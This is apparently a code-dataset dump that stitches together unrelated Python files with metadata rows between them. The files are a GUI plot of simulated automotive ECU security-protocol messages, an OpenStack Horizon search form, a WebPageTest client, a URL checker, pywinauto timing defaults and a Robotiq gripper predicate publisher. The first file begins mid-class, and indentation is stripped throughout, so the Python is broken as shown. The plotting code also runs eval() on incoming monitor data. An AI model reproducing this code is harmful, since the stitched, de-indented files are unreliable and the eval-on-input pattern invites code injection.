self.tls = self.hand_shake_tag_server_send + self.hand_shake_tag_server_rec + self.hand_shake_tag_server_process + self.hand_shake_tag_client_send + self.hand_shake_tag_client_rec + self.hand_shake_tag_client_process \
+ self.simple_tags_send + self.simple_tags_rec
# authentication
self.sec_mod_tags = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, \
MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE, MonitorTags.CP_SEC_RECEIVE_REG_MESSAGE]
self.authent_tags_send = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_ECU_SEND_REG_MESSAGE]
self.authent_tags_receive = [MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, MonitorTags.CP_ECU_VALIDATED_SEC_MOD_CERTIFICATE, MonitorTags.CP_ECU_DECRYPTED_CONF_MESSAGE]
self.author_tags_send = [MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_ECU_ENCRYPTED_REQ_MESSAGE]
self.author_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_DENY_MESSAGE, MonitorTags.CP_ECU_DECRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE]
self.simp_tags_send = [MonitorTags.CP_ECU_ENCRYPTED_SEND_SIMPLE_MESSAGE]
self.simp_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_SIMPLE_MESSAGE]
self.lw_auth = self.sec_mod_tags + self.authent_tags_send + self.authent_tags_receive + self.author_tags_send + self.author_tags_receive + self.simp_tags_send + self.simp_tags_receive
def create_widgets(self, parent):
vbox = QtGui.QVBoxLayout()
self.label = QtGui.QLabel()
self.label.setText("Chainview")
view = pg.GraphicsLayoutWidget(parent)
self.axis = ECUShowAxis(orientation='left')
self.plot = view.addPlot(axisItems={'left': self.axis})
self.plot.setLabel('left', 'ECU ID ')
self.plot.setLabel('bottom', 'Time [sec]')
self.plot.showGrid(x=True, y=True)
vbox.addWidget(self.label)
vbox.addWidget(view)
self.setLayout(vbox)
def save(self):
return self._all_points
def load(self, val_pairs):
self._all_points = val_pairs
spots = []
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
def _next_security_module_lane(self, id_string):
# determine next
# if same element return coresponding
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = -int(self._get_last_num(id_string))
except:
num = -1
if num in self._taken_lanes.values():
while True:
num += 1
if num in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def _next_ecu_lane(self, id_string):
# determine next
# if same element return coresponding
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = int(self._get_last_num(id_string))
except:
num = None
if num in self._taken_lanes.values() or num == None:
if num == None: num = 0
while True:
num += 1
if num not in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def update_gui(self, monitor_input_lst):
val_pairs = []
# print("Eventmonitor start %s" % monitor_input_lst)
for monitor_input in monitor_input_lst:
if self._already_there(str(monitor_input)): continue
# get ecu ids
if isinstance(monitor_input, str):
for ecu_id in monitor_input_lst:
if not isinstance(ecu_id, str): continue
if isinstance(ecu_id, UUID): continue
self._next_ecu_lane(ecu_id)
continue
if not isinstance(monitor_input, (list, tuple)): continue
# if self._already_there(monitor_input): continue
# Define mode
if eval(monitor_input[3]) in self.tesla:
self._mode = "TESLA"
if eval(monitor_input[3]) in self.tls:
self._mode = "TLS"
if eval(monitor_input[3]) in self.lw_auth:
self._mode = "LW_AUTH"
# extract information
try: t = monitor_input[0]
except: continue
# assign a lane to it
if eval(monitor_input[3]) in self.sec_mod_tags: # security module
id_val = self._next_security_module_lane(monitor_input[1])
else: # ecu
id_val = self._next_ecu_lane(monitor_input[1])
id_val += 0.00000001
# gather information
fst = [t, id_val, monitor_input[1]]
try: scd = [monitor_input[4], monitor_input[5], monitor_input[6], monitor_input[1], monitor_input[7], monitor_input[2], monitor_input[0]] + [t]
except: continue
# Color
color = (0, 0, 0)
symb = 0
if eval(monitor_input[3]) in self.authent_tags_send + self.hand_shake_tag_client_send + self.tesla_time_sync_send:
color = self.COLOR_ECU_AUTH
symb = 0
if eval(monitor_input[3]) in self.authent_tags_receive + self.hand_shake_tag_client_rec + self.tesla_time_sync_rec:
color = self.COLOR_ECU_AUTH
symb = 1
if eval(monitor_input[3]) in self.author_tags_send + self.hand_shake_tag_server_send + self.tesla_setup_send:
color = self.COLOR_STR_AUTH
symb = 0
if eval(monitor_input[3]) in self.author_tags_receive + self.hand_shake_tag_server_rec + self.tesla_setup_rec:
color = self.COLOR_STR_AUTH
symb = 1
if eval(monitor_input[3]) in self.simp_tags_send + self.simple_tags_send + self.tesla_simple_message_send:
color = self.COLOR_SIMPLE
symb = 0
if eval(monitor_input[3]) in self.simp_tags_receive + self.simple_tags_rec + self.tesla_simple_message_rec:
color = self.COLOR_SIMPLE
symb = 1
if eval(monitor_input[3]) in self.tesla_message_authenticated:
color = self.COLOR_PROCESS_2
symb = 2
# if eval(monitor_input[3]) in self.hand_shake_tag_server_process:
# color = self.COLOR_STR_AUTH
# symb = 2
if color == (0, 0, 0): continue
# value pair
val_pairs.append(fst + scd + [color, symb])
spots = []
try: last_free = val_pairs[0][0]
except: last_free = None
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
try: info[2] = info[2].get()
except: pass
# Points at same y positions will be shifted to be distinguishable
res = False
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if already_existing:
# x_pos = last_free
# find new value
found = False
while not found:
x_pos += 0.00001
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if not already_existing:
found = True
# last_free = x_pos
# print(" Plotting x: %s" % x_pos)
General().add_to_three_dict(self._pts_ecu, info[0], x_pos, True)
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
self._all_points += val_pairs
# self.map_points[str(s2[0])]
# print("Eventmonitor end")
def _get_last_num(self, stri):
num = ""
for el in stri[::-1]:
if isnumeric(el):
num += el
else:
break
return num[::-1]
def _id_to_str(self, msg_id):
if self._mode == "TLS":
if msg_id == can_registration.CAN_TLS_CERTIFICATE:
return "Client Certificate"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_REQUEST:
return "Certificate Request"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_VERIFY:
return "Certificate Verify"
if msg_id == can_registration.CAN_TLS_CHANGE_CIPHER_SPEC:
return "Change Cipher Spec"
if msg_id == can_registration.CAN_TLS_CLIENT_HELLO:
return "ClientHello"
if msg_id == can_registration.CAN_TLS_CLIENT_KEY_EXCHANGE:
return "Client Key Exchange"
if msg_id == can_registration.CAN_TLS_FINISHED:
return "Finished "
if msg_id == can_registration.CAN_TLS_SERVER_CERTIFICATE:
return "Server Certificate "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO:
return "ServerHello "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO_DONE:
return "ServerHelloDone "
if msg_id == can_registration.CAN_TLS_SERVER_KEY_EXCHANGE:
return "ServerKeyExchange "
if self._mode == "LW_AUTH":
if msg_id == can_registration.CAN_ECU_AUTH_ADVERTISE:
return "ECU Advertisement"
if msg_id == can_registration.CAN_ECU_AUTH_CONF_MSG:
return "Confirmation Message"
if msg_id == can_registration.CAN_ECU_AUTH_REG_MSG:
return "Registration Message"
if msg_id == can_registration.CAN_STR_AUTH_DENY_MSG:
return "Deny Message"
if msg_id == can_registration.CAN_STR_AUTH_GRANT_MSG:
return "Grant Message"
if msg_id == can_registration.CAN_STR_AUTH_INIT_MSG_STR:
return "Request Message"
if self._mode == "TESLA":
if msg_id == can_registration.CAN_TESLA_TIME_SYNC:
return "Time Sync"
if msg_id == can_registration.CAN_TESLA_TIME_SYNC_RESPONSE:
return "Time Sync Response"
if msg_id == can_registration.CAN_TESLA_KEY_EXCHANGE:
return "Key Exchange"
return msg_id
def _is_sec_mod(self, ecu):
try:
ecu._SECMODULE
return True
except:
pass
return False
| mit | -4,896,457,529,280,774,000 | 41.751012 | 253 | 0.551541 | false |
NECCSiPortal/NECCSPortal-dashboard | nec_portal/dashboards/project/history/forms.py | 1 | 2741 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from django.core.urlresolvers import reverse_lazy
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import messages
class HistoryForm(forms.SelfHandlingForm):
search = forms.CharField(label=_('Keyword'),
required=False,
max_length=255,
help_text=_(
'[1]Regular expression is available.'
'(Ex.)"user_name:demo*" '
'returns all the logs of users whose '
'name beginning with "demo". '
'[2]All columns are searched when no '
'columns are selected. '
'[3]AND/OR/NOT search operators are '
'supported.(Ex.)"user_name:demo '
'AND POST" returns POST logs of '
'user "demo".'))
start = forms.DateField(label=_('From:'),
input_formats=("%Y-%m-%d",))
end = forms.DateField(label=_('To:'),
input_formats=("%Y-%m-%d",))
def __init__(self, *args, **kwargs):
super(HistoryForm, self).__init__(*args, **kwargs)
self.fields['start'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
self.fields['end'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
def clean(self):
cleaned_data = self.cleaned_data
start_date = cleaned_data.get('start', None)
end_date = cleaned_data.get('end', None)
if start_date and end_date and start_date > end_date:
messages.error(self.request,
_('Invalid time period. The end date should be '
'more recent than the start date.'))
return cleaned_data
def handle(self, request, data):
response = shortcuts.redirect(
reverse_lazy("horizon:project:history:index"))
return response
| apache-2.0 | -1,124,052,965,189,229,300 | 43.209677 | 76 | 0.551988 | false |
CDKGlobal/cd-performance-promotion | cd_perf_promotion/modules/webpagetest.py | 1 | 4765 | import requests
import json
import time
import sys
from cd_perf_promotion.modules.perftools import PerfTools
class WebPageTest(PerfTools):
"""
Handles all of the WebPageTest API querying/data gathering
"""
def __init__(self, url, location, runs, api_key):
"""
Sets up all of the instance variables
Keyword arguments:
api_key - The WebPageTest API key (string)
test_session - The WebPageTest Test ID (string)
"""
# Test configuration information
self.url = url
self.location = location
self.runs = runs
self.api_key = api_key
# Inherit methods from parent class "PerfTools"
PerfTools.__init__(self, "WebPageTest")
def api_key_error(self):
"""
Let the user know that their WebPageTest API key limit has been exceeded
"""
print("ERROR: WebPageTest API key daily limit has been reached")
sys.exit(1)
def timeout_error(self):
"""
Let the user know that their WebPageTest UI test has timed out
"""
print("ERROR: WebPageTest has timed out")
sys.exit(1)
def run_test(self, url, location, runs, api_key):
"""
Runs the UI test
"""
# Run performance test (HTTP GET request)
run_test_url = "http://www.webpagetest.org/runtest.php?url={0}&runs={1}&f=json&location={2}&k={3}".format(url, runs, location, api_key)
try:
run_test_request = requests.get(run_test_url)
except:
self.connection_error() # Inherited from the parent class
# Make sure that the module actually got something back
# Covers cases where users enter crazy parameters or WebPageTest miraculously
# determines your query is bad
if (run_test_request.status_code != 200) or (run_test_request.json()["statusCode"] != 200):
if run_test_request.json()["statusCode"] == 400:
self.api_key_error()
else:
self.connection_error() # Inherited from the parent class
# Get the test ID so that we can look at the results later
test_id = run_test_request.json()["data"]["testId"]
# Let the user know what's going on
print("Queueing WebPageTest UI test... ({0})".format(test_id))
return test_id
def get_data(self):
"""
Gets the load test data from the API
"""
# Run the test ad get the Test ID
test_id = self.run_test(self.url, self.location, self.runs, self.api_key)
# Wait until the test results are ready
checkStatusCode = 100
timePassed = 0
testStatus = ""
test_summary_url = "http://www.webpagetest.org/jsonResult.php?test={0}".format(test_id)
while (checkStatusCode != 200):
if (timePassed > 3600):
# 60 minutes (3600 seconds) have passed, error out. Something probably went wrong.
# Pretty much have to have this timeout because WebPageTest can't be trusted
self.timeout_error() # Inherited from the parent Class
else:
# Check the test results
try:
test_summary_request = requests.get(test_summary_url)
except:
self.connection_error() # Inherited from the parent class
# Are the test results ready?
# Have to do some string to int conversions due to the XML stuff
if ((test_summary_request.status_code == 200) and
(test_summary_request.json()["statusCode"] == 200)):
# Yes, break the loop and
checkStatusCode = 200
elif ((test_summary_request.status_code == 200) and
((test_summary_request.json()["statusCode"] < 200) and
(test_summary_request.json()["statusCode"] >= 100))):
# Let the user know when the test has been started
newStatus = test_summary_request.json()["statusText"]
if newStatus != testStatus:
if (newStatus == "Test Started"):
print("Running WebPageTest UI test...")
testStatus = newStatus
# Be nice to the WebPageTest API
time.sleep(10)
timePassed += 10
else:
# Something broke
self.connection_error() # Inherited from the parent class
# Notify the user that the WebPageTest data is being grabbed
print("Retrieved WebPageTest data")
return test_summary_request.json()
| mit | -6,207,334,670,010,811,000 | 39.726496 | 143 | 0.565792 | false |
thefourtheye/elasticsearch-monitoring | url_checker.py | 1 | 2079 | from master import get_conn
try:
import simplejson as json
except ImportError:
import json
with open("urls.json") as f:
urls_data = json.load(f)
def sort(x):
return (x.get("success", False), x.get("url", ""))
def table(title, l):
temp = """
<table width='100%' border=1 cellpadding=3 cellspacing=0>
<caption>{0}</caption>
<tr><th>Expected</th><th>Actual</th><th>URL</th></tr>
""".format(title)
for item in sorted(l, key=sort):
temp += "<tr><td>" + "</td><td>".join([
str(item["expected"] or ""),
str(item["actual"] or ""),
str(item["url"] or "")
]) + "</td></tr>"
return temp + "</table><br/>"
def url_checker():
results = {
"severity": "INFO",
"title": "URLs Checker",
"body": ""
}
responses = []
for key, value in urls_data.items():
res, _, conn = get_conn(value.get("host"), value)[0]
expected = value.get("expectedHTTPCode", 200)
url = "{0}://{1}{2}".format(
value.get("protocol", "http"),
value.get("host", ""),
value.get("path", "")
)
result = {
"success": True,
"expected": expected,
"url": url
}
if res:
try:
r1 = conn(value.get("path", ""))
r1.read()
result.update({
"success": int(r1.status) == expected,
"actual": r1.status
})
except Exception, ex:
result.update({
"success": False,
"actual": str(ex)
})
else:
result.update({
"success": False,
"actual": "Unable to establish connection to {0}".format(url)
})
responses.append(result)
if any(not r.get("success", False) for r in responses):
results["severity"] = "FATAL"
results["body"] = table("URLs Checker", responses)
return results
| mit | -1,274,268,218,179,104,300 | 26.72 | 77 | 0.46176 | false |
MagazinnikIvan/pywinauto | pywinauto/timings.py | 1 | 14481 | # GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Timing settings for all of pywinauto
This module has one object that should be used for all timing adjustments
timings.Timings
There are a couple of predefined settings
timings.Timings.Fast()
timings.Timings.Defaults()
timings.Timings.Slow()
The Following are the individual timing settings that can be adjusted:
* window_find_timeout (default 5)
* window_find_retry (default .09)
* app_start_timeout (default 10)
* app_start_retry (default .90)
* cpu_usage_interval (default .5)
* cpu_usage_wait_timeout (default 20)
* exists_timeout (default .5)
* exists_retry (default .3)
* after_click_wait (default .09)
* after_clickinput_wait (default .09)
* after_menu_wait (default .1)
* after_sendkeys_key_wait (default .01)
* after_button_click_wait (default 0)
* before_closeclick_wait (default .1)
* closeclick_retry (default .05)
* closeclick_dialog_close_wait (default 2)
* after_closeclick_wait (default .2)
* after_windowclose_timeout (default 2)
* after_windowclose_retry (default .5)
* after_setfocus_wait (default .06)
* setfocus_timeout (default 2)
* setfocus_retry (default .1)
* after_setcursorpos_wait (default .01)
* sendmessagetimeout_timeout (default .01)
* after_tabselect_wait (default .05)
* after_listviewselect_wait (default .01)
* after_listviewcheck_wait default(.001)
* after_treeviewselect_wait default(.1)
* after_toobarpressbutton_wait default(.01)
* after_updownchange_wait default(.1)
* after_movewindow_wait default(0)
* after_buttoncheck_wait default(0)
* after_comboboxselect_wait default(.001)
* after_listboxselect_wait default(0)
* after_listboxfocuschange_wait default(0)
* after_editsetedittext_wait default(0)
* after_editselect_wait default(.02)
* drag_n_drop_move_mouse_wait default(.1)
* before_drag_wait default(.2)
* before_drop_wait default(.1)
* after_drag_n_drop_wait default(.1)
* scroll_step_wait default(.1)
"""
import time
import operator
from functools import wraps
#=========================================================================
class TimeConfig(object):
"""Central storage and manipulation of timing values"""
__default_timing = {
'window_find_timeout' : 5.,
'window_find_retry' : .09,
'app_start_timeout' : 10.,
'app_start_retry' : .90,
'cpu_usage_interval' : .5,
'cpu_usage_wait_timeout' : 20.,
'exists_timeout' : .5,
'exists_retry' : .3,
'after_click_wait' : .09,
'after_clickinput_wait' : .09,
'after_menu_wait' : .1,
'after_sendkeys_key_wait' : .01,
'after_button_click_wait' : 0,
'before_closeclick_wait' : .1,
'closeclick_retry' : .05,
'closeclick_dialog_close_wait' : 2.,
'after_closeclick_wait' : .2,
'after_windowclose_timeout': 2,
'after_windowclose_retry': .5,
'after_setfocus_wait': .06,
'setfocus_timeout': 2,
'setfocus_retry': .1,
'after_setcursorpos_wait' : .01,
'sendmessagetimeout_timeout' : .01,
'after_tabselect_wait': .05,
'after_listviewselect_wait': .01,
'after_listviewcheck_wait': .001,
'after_treeviewselect_wait': .1,
'after_toobarpressbutton_wait': .01,
'after_updownchange_wait': .1,
'after_movewindow_wait': 0,
'after_buttoncheck_wait': 0,
'after_comboboxselect_wait': 0.001,
'after_listboxselect_wait': 0,
'after_listboxfocuschange_wait': 0,
'after_editsetedittext_wait': 0,
'after_editselect_wait': 0.02,
'drag_n_drop_move_mouse_wait': 0.1,
'before_drag_wait': 0.2,
'before_drop_wait': 0.1,
'after_drag_n_drop_wait': 0.1,
'scroll_step_wait': 0.1,
}
assert(__default_timing['window_find_timeout'] >=\
__default_timing['window_find_retry'] * 2)
_timings = __default_timing.copy()
_cur_speed = 1
def __getattribute__(self, attr):
"""Get the value for a particular timing"""
if attr in ['__dict__', '__members__', '__methods__', '__class__']:
return object.__getattribute__(self, attr)
if attr in dir(TimeConfig):
return object.__getattribute__(self, attr)
if attr in self.__default_timing:
return self._timings[attr]
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def __setattr__(self, attr, value):
"""Set a particular timing"""
if attr == '_timings':
object.__setattr__(self, attr, value)
elif attr in self.__default_timing:
self._timings[attr] = value
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def Fast(self):
"""Set fast timing values
Currently this changes the timing in the following ways:
timeouts = 1 second
waits = 0 seconds
retries = .001 seconds (minimum!)
(if existing times are faster then keep existing times)
"""
for setting in self.__default_timing:
# set timeouts to the min of the current speed or 1 second
if "_timeout" in setting:
self._timings[setting] = \
min(1, self._timings[setting])
if "_wait" in setting:
self._timings[setting] = self._timings[setting] / 2
elif setting.endswith("_retry"):
self._timings[setting] = 0.001
#self._timings['app_start_timeout'] = .5
def Slow(self):
"""Set slow timing values
Currently this changes the timing in the following ways:
timeouts = default timeouts * 10
waits = default waits * 3
retries = default retries * 3
(if existing times are slower then keep existing times)
"""
for setting in self.__default_timing:
if "_timeout" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 10,
self._timings[setting])
if "_wait" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
elif setting.endswith("_retry"):
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
if self._timings[setting] < .2:
self._timings[setting]= .2
def Defaults(self):
"""Set all timings to the default time"""
self._timings = self.__default_timing.copy()
Timings = TimeConfig()
#=========================================================================
class TimeoutError(RuntimeError):
pass
#=========================================================================
def always_wait_until(
timeout,
retry_interval,
value = True,
op = operator.eq):
"""Decorator to call wait_until(...) every time for a decorated function/method"""
def wait_until_decorator(func):
"""Callable object that must be returned by the @always_wait_until decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until(timeout, retry_interval,
func, value, op, *args)
return wrapper
return wait_until_decorator
#=========================================================================
def wait_until(
timeout,
retry_interval,
func,
value = True,
op = operator.eq,
*args):
r"""Wait until ``op(function(*args), value)`` is True or until timeout expires
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **value** the value to be compared against (defaults to True)
* **op** the comparison function (defaults to equality)\
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the return value of the the function
is in the 'function_value' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# the objects item_count() method to return 10
# in increments of .5 of a second
wait_until(10.5, .5, self.item_count, 10)
except TimeoutError as e:
print("timed out")
"""
start = time.time()
func_val = func(*args)
# while the function hasn't returned what we are waiting for
while not op(func_val, value):
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
func_val = func(*args)
else:
err = TimeoutError("timed out")
err.function_value = func_val
raise err
return func_val
# Non PEP-8 alias
WaitUntil = wait_until
#=========================================================================
def always_wait_until_passes(
timeout,
retry_interval,
exceptions = (Exception)):
"""Decorator to call wait_until_passes(...) every time for a decorated function/method"""
def wait_until_passes_decorator(func):
"""Callable object that must be returned by the @always_wait_until_passes decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until_passes(timeout, retry_interval,
func, exceptions, *args)
return wrapper
return wait_until_passes_decorator
#=========================================================================
def wait_until_passes(
timeout,
retry_interval,
func,
exceptions = (Exception),
*args):
"""Wait until ``func(*args)`` does not raise one of the exceptions in exceptions
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **exceptions** list of exceptions to test against (default: Exception)
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the original exception raised is in
the 'original_exception' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# window to be found in increments of .5 of a second.
# P.int a message and re-raise the original exception if never found.
wait_until_passes(10.5, .5, self.Exists, (ElementNotFoundError))
except TimeoutError as e:
print("timed out")
raise e.
"""
start = time.time()
# keep trying until the timeout is passed
while True:
try:
# Call the function with any arguments
func_val = func(*args)
# if no exception is raised then we are finished
break
# An exception was raised - so wait and try again
except exceptions as e:
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
else:
# Raise a TimeoutError - and put the original exception
# inside it
err = TimeoutError()
err.original_exception = e
raise err
# return the function value
return func_val
# Non PEP-8 alias
WaitUntilPasses = wait_until_passes
| bsd-3-clause | -3,935,834,530,646,250,000 | 31.676744 | 94 | 0.585181 | false |
cpaxton/predicator | predicator_robotiq/src/predicator_robotiq/s_model.py | 1 | 5702 | # predicator (c) 2014-2016, Chris Paxton
#
# based on some code taken from Robotiq's s_model_control package:
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Robotiq, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Robotiq, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Copyright (c) 2012, Robotiq, Inc.
# Revision $Id$
import rospy
from robotiq_s_model_control.msg import SModel_robot_input as inputMsg
from predicator_msgs.msg import *
class SModelPredicator:
def __init__(self,publish_predicates=True,start_subscriber=True,gripper_name='s_model'):
self.valid_predicates = ValidPredicates(assignments=[gripper_name],predicates=['gripper_open','gripper_closed','gripper_moving',
'gripper_basic_mode','gripper_pinch_mode','gripper_wide_mode','gripper_scissor_mode','gripper_activated',
'finger_a_contact','finger_b_contact','finger_c_contact','any_finger_contact'])
self.predicate_msg = PredicateList()
self.gripper_name = gripper_name
self.gripper_mode = ''
self.activated = False
self.contact = False
self.closed = False
self.moving = False
if publish_predicates:
# create predicator things
self.pub = rospy.Publisher("predicator/input",PredicateList,queue_size=1000)
self.vpub = rospy.Publisher("predicator/valid_predicates",PredicateList,queue_size=1000)
if start_subscriber:
self.sub = rospy.Subscriber("SModelRobotInput",inputMsg,self.callback)
self.name = rospy.get_name()
def callback(self, msg):
self.handle(msg)
def handle(self,status):
self.predicate_msg = PredicateList()
self.predicate_msg.pheader.source = self.name
if(status.gACT == 0):
# gripper reset
pass
if(status.gACT == 1):
self.addPredicate('gripper_activated')
self.activated = False
else:
self.activated = True
if(status.gMOD == 0):
self.addPredicate('gripper_basic_mode')
self.gripper_mode = 'basic'
elif(status.gMOD == 1):
self.addPredicate('gripper_pinch_mode')
self.gripper_mode = 'pinch'
elif(status.gMOD == 2):
self.addPredicate('gripper_wide_mode')
self.gripper_mode = 'wide'
elif(status.gMOD == 3):
self.addPredicate('gripper_scissor_mode')
self.gripper_mode = 'scissor'
if ((status.gGTO == 1) # going to position (GOTO command)
or (status.gIMC == 2) # mode change in progress
or (status.gSTA == 0) # in motion towards position
):
self.addPredicate('gripper_moving')
self.moving = True
else:
self.moving = False
contact = False
if (status.gDTA == 1 or status.gDTA == 2):
self.addPredicate('finger_a_contact')
contact = True
if (status.gDTB == 1 or status.gDTB == 2):
self.addPredicate('finger_b_contact')
contact = True
if (status.gDTC == 1 or status.gDTC == 2):
self.addPredicate('finger_c_contact')
contact = True
self.contact = contact
if contact:
self.addPredicate('any_finger_contact')
if ((status.gDTA >= 2 and status.gDTB >= 2 and status.gDTC >= 2 and status.gPRA >= 250) # fingers closed or stopped closing
or (status.gDTS >=2 and status.gPRA >= 250) # scissor closing
):
self.addPredicate('gripper_closed')
self.closed = True
else:
self.closed = False
'''
add a single message
'''
def addPredicate(self,predicate):
p = PredicateStatement(predicate=predicate,params=[self.gripper_name,'',''])
self.predicate_msg.predicates.append(p)
'''
publish current predicate messages
'''
def tick(self):
self.pub.publish(self.predicate_msg)
